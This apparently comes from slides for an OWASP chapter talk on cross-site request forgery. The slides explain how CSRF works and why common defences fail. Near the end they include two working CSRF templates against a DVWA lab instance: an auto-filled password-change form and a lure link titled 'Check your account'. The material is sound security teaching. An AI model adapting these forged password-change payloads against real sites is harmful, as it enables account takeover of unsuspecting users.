  • 1. CROSS SITE REQUEST FORGERY UNDERSTANDING John Patrick Lita - OWASP Manila Chapter President Venue: Philippine Army, Cyber Security Division, Taguig City
 OWASP Taguig Chapter
  • 2. DEEP UNDERSTANDING WITH CSRF VULNERABILITY MEET THE PRESENTER OWASP Manila Chapter President
 Project Manager at Enterprise Linux Professionals
 Owner of Active Security Training and Consultancy
 Project leader for 
 OWASP Online Academy john.patrick.lita@owasp.org 2
  • 3. DEEP UNDERSTANDING WITH CSRF VULNERABILITY CROSS SITE REQUEST FORGERY Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated. CSRF attacks specifically target state-changing requests, not theft of data, since the attacker has no way to see the response to the forged request. With a little help of social engineering (such as sending a link via email or chat), an attacker may trick the users of a web application into executing actions of the attacker's choosing. If the victim is a normal user, a successful CSRF attack can force the user to perform state changing requests like transferring funds, changing their email address, and so forth. If the victim is an administrative account, CSRF can compromise the entire web application. 3
  • 4. DEEP UNDERSTANDING WITH CSRF VULNERABILITY CSRF ILLUSTRATION 4 C Regular Form CSRF Form Template COMMENT HERE: COMMENT HERE: POST POST
  • 5. DEEP UNDERSTANDING WITH CSRF VULNERABILITY CSRF ILLUSTRATION 5 C Regular Form CSRF Form Template COMMENT HERE: COMMENT HERE: POST POST I AM AWESOME!
  • 6. DEEP UNDERSTANDING WITH CSRF VULNERABILITY CSRF ILLUSTRATION 6 C Regular Form CSRF Form Template COMMENT HERE: COMMENT HERE: POST POST I AM AWESOME! Jaypee: I AM AWESOME!
  • 7. DEEP UNDERSTANDING WITH CSRF VULNERABILITY CSRF ILLUSTRATION 7 C Regular Form CSRF Form Template COMMENT HERE: COMMENT HERE: POST POST I AM NOOB!
  • 8. DEEP UNDERSTANDING WITH CSRF VULNERABILITY CSRF ILLUSTRATION 8 C Regular Form CSRF Form Template COMMENT HERE: COMMENT HERE: POST POST I AM NOOB!
  • 9. DEEP UNDERSTANDING WITH CSRF VULNERABILITY CSRF ILLUSTRATION 9 C Regular Form CSRF Form Template COMMENT HERE: COMMENT HERE: POST POST I AM NOOB! Jaypee: I AM NOOB!
  • 10. DEEP UNDERSTANDING WITH CSRF VULNERABILITY CANNOT READ THE ANTI-CSRF 10
  • 11. DEEP UNDERSTANDING WITH CSRF VULNERABILITY NO SERVER SIDE VALIDATION 11
  • 12. DEEP UNDERSTANDING WITH CSRF VULNERABILITY REVIEWING THE FORM 12
  • 13. DEEP UNDERSTANDING WITH CSRF VULNERABILITY THE CHECKING THE SOURCE CODE 13
  • 14. CSRF DEMO DEEP UNDERSTANDING WITH CSRF VULNERABILITY
  • 15. PREVENTION MEASURES THAT DO NOT WORK CSRF TEMPLATE WEB INTERFACE Try to copy the code of the CSRF Template and save it as HTML File. then open the file with any 
 browser you like. then click the submit and analyse the behaviour.
 
 After that try yo login. please proceed to next page for source code. Page 16 15
  • 16. PREVENTION MEASURES THAT DO NOT WORK CSRF TEMPLATE SOURCE CODE <!DOCTYPE html> <html>
 <head>
 <title>CSRF Template</title>
 </head>
 <body>
 <br> <form action="http://172.16.157.129/dvwa/vulnerabilities/csrf/?" method="GET"> New Password:<br>
 <input type="password" AUTOCOMPLETE="off" name="password_new" value="12345"><br>
 Confirm New Password: <br>
 <input type="password" AUTOCOMPLETE="off" name="password_conf" value="12345"><br>
 <input type="submit" value="Change" name="Change">
 
 </form>
 </body>
 </html> 16
  • 17. PREVENTION MEASURES THAT DO NOT WORK PREVENTION MEASURES THAT DO NOT WORK ▸ Using a secret cookie ▸ Remember that all cookies, even the secret ones, will be submitted with every request. All authentication tokens will be submitted regardless of whether or not the end-user was tricked into submitting the request. Furthermore, session identifiers are simply used by the application container to associate the request with a specific session object. The session identifier does not verify that the end-user intended to submit the request. 17
  • 18. PREVENTION MEASURES THAT DO NOT WORK PREVENTION MEASURES THAT DO NOT WORK ▸ Only Accept POST requests ▸ Applications can be developed to only accept POST requests for the execution of business logic. The misconception is that since the attacker cannot construct a malicious link, a CSRF attack cannot be executed. Unfortunately, this logic is incorrect. There are numerous methods in which an attacker can trick a victim into submitting a forged POST request, such as a simple form hosted in an attacker's Website with hidden values. This form can be triggered automatically by JavaScript or can be triggered by the victim who thinks the form will do something else. POST
 REQUEST 18
  • 19. PREVENTION MEASURES THAT DO NOT WORK PREVENTION MEASURES THAT DO NOT WORK ▸ Multi-Step Transaction
 Multi-Step transactions are not an adequate prevention of CSRF. As long as an attacker can predict or deduce each step of the completed transaction, then CSRF is possible. ▸ URL Rewriting
 This might be seen as a useful CSRF prevention technique as the attacker cannot guess the victim's session ID. However, the user’s session ID is exposed in the URL. We don't recommend fixing one security flaw by introducing another. ▸ HTTPS
 HTTPS does nothing to defend against CSRF. 19
  • 20. CSRF DEMO DEEP UNDERSTANDING WITH CSRF VULNERABILITY
  • 21. PREVENTION MEASURES THAT DO NOT WORK CSRF ATTACK USING SOCIAL ENGINEERING One of the technique or attack vector is to perform a click jacking attack, to test this attack please 
 proceed on the next page for the source code, then try to executing it by clicking the “Click Here!” 21
  • 22. PREVENTION MEASURES THAT DO NOT WORK CSRF ATTACK USING SOCIAL ENGINEERING <!DOCTYPE html> <html>
 <title>Please Check your Account Here!</title>
 <head>Check your account Here!</head>
 <body> <a href="http://172.16.157.129/dvwa/vulnerabilities/csrf/? password_new=password&password_conf=password&Change=Change#">Click Here!</a>
 
 </body>
 </html>